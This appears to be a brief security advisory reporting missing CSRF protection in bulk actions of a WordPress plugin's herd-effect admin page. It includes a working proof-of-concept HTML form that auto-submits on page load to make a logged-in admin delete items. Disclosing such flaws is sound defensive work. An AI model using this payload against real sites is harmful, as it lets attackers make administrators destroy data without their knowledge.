Description The plugin does not have CSRF checks in some bulk actions, which could allow attackers to make logged in admins perform unwanted actions, such as deleting effects via CSRF attacks
Make a logged in admin open an HTML file where ID is a valid ID:
```
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/admin.php?page=mwp-herd-effect" method="POST">
<input type="text" name="ID" value="1" />
<input type="text" name="action" value="delete-items" />
<input type="text" name="action2" value="delete-items" />
action
<input type="submit" value="submit">
</form>
</body>
```